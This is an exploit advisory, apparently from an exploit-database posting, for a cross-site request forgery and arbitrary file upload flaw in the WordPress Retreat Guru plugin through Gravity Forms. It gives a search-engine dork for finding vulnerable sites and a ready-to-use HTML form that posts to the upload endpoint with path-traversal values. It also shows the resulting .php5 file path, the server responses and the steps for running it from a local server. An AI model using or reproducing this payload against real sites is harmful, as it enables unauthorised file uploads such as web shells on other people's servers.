WordPress Retreat Guru Cross Site Request Forgery

1. ####################################################################
2.  
3. # Exploit Title : WordPress Retreat Guru Cross Site Request Forgery
4. # Author [ Discovered By ] : KingSkrupellos
5. # Team : Cyberizm Digital Security Army
6. # Date : 22/05/2019
7. # Vendor Homepage : retreat.guru - gravityforms.com
8. # Software Affected Versions : N/A
9. # Tested On : Windows and Linux
10. # Category : WebApps
11. # Exploit Risk : Medium
12. # Google Dorks : intext:Site by Retreat Guru site:com
13. # Vulnerability Type : CWE-352 [ Cross-Site Request Forgery (CSRF) ]
14. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
15. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
16. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
17.  
18. ####################################################################
19.  
20. # Impact :
21. ***********
22. WordPress Retreat Guru is vulnerable to cross-site request forgery, caused by
23. improper validation of user-supplied input. By persuading an authenticated user to visit
24. a malicious Web site, a remote attacker could send a malformed HTTP request to
25. perform unauthorized actions. An attacker could exploit this vulnerability to perform
26. cross-site scripting attacks, Web cache poisoning, and other malicious activities.
27.  
28. The web application does not, or can not, sufficiently verify whether a well-formed,
29. valid, consistent request was intentionally provided by the user who submitted the request.
30. When a web server is designed to receive a request from a client without any mechanism
31. for verifying that it was intentionally sent, then it might be possible for an attacker to trick a
32. client into making an unintentional request to the web server which will be treated as an
33. authentic request. This can be done via a URL, image load, XMLHttpRequest, etc. and
34. can result in exposure of data or unintended code execution.
35.  
36. ####################################################################
37.  
38. # CSRF Cross Site Request Forgery Exploit :
39. ****************************************
40. <title>WordPress Retreat Guru Input Exploiter</title>
41.  
42. <form action="http://[VULNERABLEWEBSITE]/?gf_page=upload" method="post" enctype="multipart/form-data">
43.  
44. <body background=" ">
45.  
46. <input type="file" name="file" id="file"><br>
47. <input name="form_id" value="../../../" type=hidden">
48. <input name="name" value="kingskrupellos.html" type=''hidden">
49. <input name="gform_unique_id" value="../../" type="hidden">
50. <input name="field_id" value="" type="hidden">
51. <input type="submit" name="gform_submit" value="submit">
52.  
53. </form>
54.  
55. # Directory File Path :
56. ***********************
57. /_input__kingskrupellos.php5
58.  
59. /_input__[YOURFILENAME].php5
60.  
61. # Vulnerability Error :
62. *******************
63. {"status" : "error", "error" : {"code": 500, "message": "Failed to upload file."}}
64.  
65. # Vulnerability Error [ Successful ] :
66. *******************************
67. {"status":"ok","data":{"temp_filename":"..\/..\/_input__kingskrupellos.php5","uploaded_filename":"kingskrupellos.php"}}
68.  
69. # Allowed File Extensions :
70. *************************
71. .html .htm .php5 .php2 .txt .jpg .gif .png .html.fla .phtml .pdf
72.  
73. # Example Usage for Windows :
74. ******************************
75. # Use with XAMPP Control Panel and your Localhost.
76. # Use from htdocs folder located in XAMPP
77.  
78. # 127.0.0.1/wordpressretreatguruexploiter.html
79.  
80. ####################################################################
81.  
82. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
83.  
84. ####################################################################